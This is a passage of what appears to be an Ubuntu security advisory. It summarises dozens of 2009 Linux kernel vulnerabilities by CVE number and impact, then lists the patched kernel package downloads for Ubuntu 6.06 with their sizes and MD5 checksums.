(CVE-2009-2909) Jan Beulich discovered that the kernel could leak register contents to 32-bit processes that were switched to 64-bit mode. A local attacker could run a specially crafted binary to read register values from an earlier process, leading to a loss of privacy. (CVE-2009-2910) Dave Jones discovered that the gdth SCSI driver did not correctly validate array indexes in certain ioctl calls. A local attacker could exploit this to crash the system or gain elevated privileges. (CVE-2009-3080) Eric Dumazet and Jiri Pirko discovered that the TC and CLS subsystems would leak kernel memory via uninitialized structure members. A local attacker could exploit this to read several bytes of kernel memory, leading to a loss of privacy. (CVE-2009-3228, CVE-2009-3612) Earl Chew discovered race conditions in pipe handling. A local attacker could exploit anonymous pipes via /proc/*/fd/ and crash the system or gain root privileges. (CVE-2009-3547) Dave Jones and Francois Romieu discovered that the r8169 network driver could be made to leak kernel memory. A remote attacker could send a large number of jumbo frames until the system memory was exhausted, leading to a denial of service. Ubuntu 9.10 was not affected. (CVE-2009-3613). Ben Hutchings discovered that the ATI Rage 128 video driver did not correctly validate initialization states. A local attacker could make specially crafted ioctl calls to crash the system or gain root privileges. (CVE-2009-3620) Tomoki Sekiyama discovered that Unix sockets did not correctly verify namespaces. A local attacker could exploit this to cause a system hang, leading to a denial of service. (CVE-2009-3621) J. Bruce Fields discovered that NFSv4 did not correctly use the credential cache. A local attacker using a mount with AUTH_NULL authentication could exploit this to crash the system or gain root privileges. Only Ubuntu 9.10 was affected. (CVE-2009-3623) Alexander Zangerl discovered that the kernel keyring did not correctly reference count. A local attacker could issue a series of specially crafted keyring calls to crash the system or gain root privileges. Only Ubuntu 9.10 was affected. (CVE-2009-3624) David Wagner discovered that KVM did not correctly bounds-check CPUID entries. A local attacker could exploit this to crash the system or possibly gain elevated privileges. Ubuntu 6.06 and 9.10 were not affected. (CVE-2009-3638) Avi Kivity discovered that KVM did not correctly check privileges when accessing debug registers. A local attacker could exploit this to crash a host system from within a guest system, leading to a denial of service. Ubuntu 6.06 and 9.10 were not affected. (CVE-2009-3722) Philip Reisner discovered that the connector layer for uvesafb, pohmelfs, dst, and dm did not correctly check capabilties. A local attacker could exploit this to crash the system or gain elevated privileges. Ubuntu 6.06 was not affected. (CVE-2009-3725) Trond Myklebust discovered that NFSv4 clients did not robustly verify attributes. A malicious remote NFSv4 server could exploit this to crash a client or gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-3726) Robin Getz discovered that NOMMU systems did not correctly validate NULL pointers in do_mmap_pgoff calls. A local attacker could attempt to allocate large amounts of memory to crash the system, leading to a denial of service. Only Ubuntu 6.06 and 9.10 were affected. (CVE-2009-3888) Joseph Malicki discovered that the MegaRAID SAS driver had world-writable option files. A local attacker could exploit these to disrupt the behavior of the controller, leading to a denial of service. (CVE-2009-3889, CVE-2009-3939) Roel Kluin discovered that the Hisax ISDN driver did not correctly check the size of packets. A remote attacker could send specially crafted packets to cause a system crash, leading to a denial of service. (CVE-2009-4005) Lennert Buytenhek discovered that certain 802.11 states were not handled correctly. A physically-proximate remote attacker could send specially crafted wireless traffic that would crash the system, leading to a denial of service. Only Ubuntu 9.10 was affected. (CVE-2009-4026, CVE-2009-4027) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.81.diff.gz Size/MD5: 2935685 f02a9bae29050a193309e77ee42159be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.81.dsc Size/MD5: 2438 517a8ee285195a5ff321568c59f5bf6a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.81_all.deb Size/MD5: 5169762 5aaebc8fc065a423115d182c5e827fa5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.81_all.deb Size/MD5: 96268 278d2a71218ca9bf14c0666008e07e3e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.81_all.deb Size/MD5: 44738268 ad52ee857cbd430327b0f4992319896c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 22344 a64ecf31e61070d46b48dd3512ea3050 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 44780 ed4c2d6a34bfffcc50e3eefeace5c0bf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 2314 223e3b70c8f186d4cfc34d722e525fcf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 36294 41bd561155707c4d0040cbba52d540bd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 102366 e49dbfa6c86a67aea0870813f2ad65e3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 38896 c4649145984881dc87d3e82a5d8bea6f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 49156 5a7492d95d0685f2411e963947427e06 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 176622 072ae033dcdbf100ddf9ef8dd7cdc395 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 36776 737c4138eba37b8e52091f5116bcfde8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 142356 2d8e8e06b65f991416a440ef3798358e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 51060 3fe055074212448af6f6932b4df2ec4a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 140706 6c06b4ccbe63938f6c0a984558389cc4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 287610 cabd37d9b352709d54cff1dc153da0f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 97830 f6a7cd5678906c026ffbcfa11eadf4a4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 1652044 0a016d1b9dcbb41586f1da7ceaa7b6c2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.81_amd64.deb Size/MD5: 870518 560fa1e60e0db020bfa3364ab74d66ac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.81_amd64.deb Size/MD5: 870276 46d4e84e4f1ee39fed22643a0809e594 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.81_amd64.deb Size/MD5: 873616 4edcfe3bb3079dc6a35a720133820e2d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.81_amd64.deb Size/MD5: 869834 753c230bc907dd59445facca3b5e1026 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.81_amd64.deb Size/MD5: 6926772 974d203583deb6ed8558b8196fb94365 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.81_amd64.deb Size/MD5: 20817880 84659ab75e65f13d8d532e3b7edadada http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.81_amd64.deb Size/MD5: 20797712 011132a3cca9526b0b08e441c8a51a75 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.81_amd64.deb Size/MD5: 21635602 85687c76e33fa6dd04ed8d580548dd50 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.81_amd64.deb Size/MD5: 19904842 98519486a58e8d47a8eb8b210cf1bd79 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 15632 f9dd1008c1be2af2f56ecc19dca84c60 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 240368 824deb0ea15a22b921980ace3f4a07b2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 202666 c99c240a9a556526e7d43b49da14987b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 1048612 85c729112e1301a89eeeca16940ab691 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 1543552 f99f369cf4bdb04f940cd76d80f0a5df http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 161690 c189c8ea4c0f3a47ef22cd02b13f57b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 9836 6dfb0d2dd0babfe597cb44d6e4c54828 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 80870 f900f2ea6fc7300b2ae6ec3092e7eb50 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 49292 90d94d9eb2c2ab2d87d4a2be33d3a434 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 35160 ae0a0d97bc18df1f72278b04758cb070 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 70896 f9249ffa075b822beb1f3336d9c1c529 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 6222 4b71e716ecbc3102b2ad864503a8fe31 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 9060 68404ac8970062ec211bed8aed0edf7b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 57920 8459346a6884404ecfb2dab3ef1a3ed8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 123378 d3b31c9c831217c670e35f4f0d3f2e71 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 101074 bd22448162bec1b099ee30c159a75ff3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 79276 85c77ee5e5a9459a1c724d90a9f05e3f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 1595360 51faa5aa6401b14be0a12dfa3ed4c104 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 72358 78b96c5de835dffca6b66d5cb2d09a08 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 12646 5c44a20f536fda99189254823d033a74 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 33804 1218ee7fe2425b62366bde89b82153e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 138520 e181a6c9b7b8324951501d6be875f20d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 38938 2558e8f83fba3cef739600021bd17a4b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.81_amd64.udeb Size/MD5: 278876 9f33f50455bf32d8d9c2c516edbcf514 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 18974 f51490588cc0d50df30db8e57bd34bf1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 43490 5fa76c0ebf00aab3c3a934e85c70a2d7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 105210 e35436beb363c322dd656a5243c29099 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 2284 2d1d3fae39ec27e4e3b5be7e493a9392 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 34576 434f0e50894f72f15f50317a7b74450a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 97048 d2df8cf1db5cb357dc16a484897c91ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 37130 eba74b5dfa05d5f9afc4e00a6deed0bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 44114 bd0c1ded68cc32323f8c01d30ab8f66c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 167748 01d733322cf43e8ce24e5ae91a4ef7f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 33958 fdc056db22be72457f653b64ef1b5f6d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 137978 ca10c22d6d4f0284e885577268c3f09a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 46906 ed9257013b336c0a5dda7bf76e9ebea5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 133164 5e4137ab0a78d922d2cb976dccba94a2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 273788 02c6bf6bcaa13759a2aa9b5a3b230f96 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 102336 6a4c31f8000ec53d65c84b8909878833 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 1597622 d4eddbd4c6a5043f1a5508722f8021dd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.81_i386.deb Size/MD5: 861450 b97274807d7dd03216304c28c54c6cbe http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.81_i386.deb Size/MD5: 861078 1f072db9add7db9027fef9739c11b6df http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.81_i386.deb Size/MD5: 863038 df210f876968e11cd148e4a03c1889c9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.81_i386.deb Size/MD5: 867886 d140160c3058f1116c7473bd4c187153 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.81_i386.deb Size/MD5: 865410 085f01426254744aee1760553cd24a0e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.81_i386.deb Size/MD5: 6918372 f812d48e805f1ac79bd1b807733af1cd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.81_i386.deb Size/MD5: 21724408 e48ae320333a6aa0216844ffcb42162e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.81_i386.deb Size/MD5: 22517334 47afd3b1801186fcc4e0940673fee4a6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.81_i386.deb Size/MD5: 22263888 e896da34cfdf83f3e22c67852aed894e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.81_i386.deb Size/MD5: 23627022 cfef50e70cb8cb74ae77ce9446e8902a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.81_i386.deb Size/MD5: 23179132 841092309f80b76bc44789796d865127 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 15512 075afc34939f93ec5a71278793dbf692 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 238508 48105a0fc64c40b7076ad6e64a3d95fa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 197134 9f989fa8e02f521bcf24084124bc970b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 1048390 9c2fa2ad80ca36c67ed84ddb51c19c7b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 1741344 2c1de9f5fad31b59f759dde9c73cc5a9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 160896 5be7de021266a099bec03a7915f98fa5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 9168 aeca6a4cb4ca6b994e324c400548f987 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 76468 130ea9ecb2512a11a34e70421caffb6d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 53552 3ffe6ce857fcb7956903b57119a8d5db http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 33048 62920dc04689f0f526f2e3f9f45b0323 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 85624 ada1b3fd1802c18efe019dc6ca0b63ea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 6024 c2dd977a054700c1752b18c13691962a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 8760 3a6cc477cf8ce01e5620274cd4b8a5c6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 53638 a50d7f70fb77f5bcd2658fd753026219 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 130968 55fb39360005be1e69d489736884d49e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 98468 1b1ff6d797d518803eb2603db1c45642 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 77216 a2b6e29fb22eadf72b78e8eb5b5c52f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 1768852 218108b6057487da1a7f607bd080b8bc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 69618 bc3ba4e6a2772849a540ae12b9591b0e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 11768 6394883c954351652b01693ba00f0f31 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 36104 de1b30734949cb0804561ff8c17ebe05 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 132672 a29e064f424e01e7762cf1b8b0383767 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 38576 ab3590603fb72881abcdec1b850ffedf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.81_i386.udeb Size/MD5: 299158 9e2c3a94ac8d5211b3959f97783f416f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 23730 b5d3e994e65adb62f6b0ce488a7817c4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 26006 a681b1c055c24a085a92d0251522332f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 49322 87d68c94afff04e05764d4ed27a3e733 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 51532 223742321ffe94b336f94357432f0d47 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 2308 94f539c3ce6e465082796c8a9e23bdfd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 2482 123c13d5536eb9415af80781c1ed19d8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 40306 c28e7cda2f38caf71b12950a8ce0ac65 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 43848 9ad92bff5e36cf314ac79ac18523f498 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 112602 3ff1577e2dd76d3b2baf16f153ba45ce http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 120738 725af40fb54924e7f63de75de33bba09 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 40902 d15977353cc473b676f6ca4e27eca2f7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 46000 996debcf5ba6953922316a14818261dd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 29026 a247d21692fb5d238feb8fb8897b7bb6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 29892 b0a1919b18647f46180290b5a487e876 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 211388 172f7544e0dba2c15be93749e826cd40 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 225184 4d83d2d27ca8ee8b75c9fe485f95891a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 45056 adc0ea8242aef5c768d80f4a5487c5ef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 40224 e9ece393c50aa4509bbc067d037a1964 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1938 116a8c6e92f39048e5e5e8c7157ad816 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 2198 300eccf25d58840151ef17f9ffa0cd51 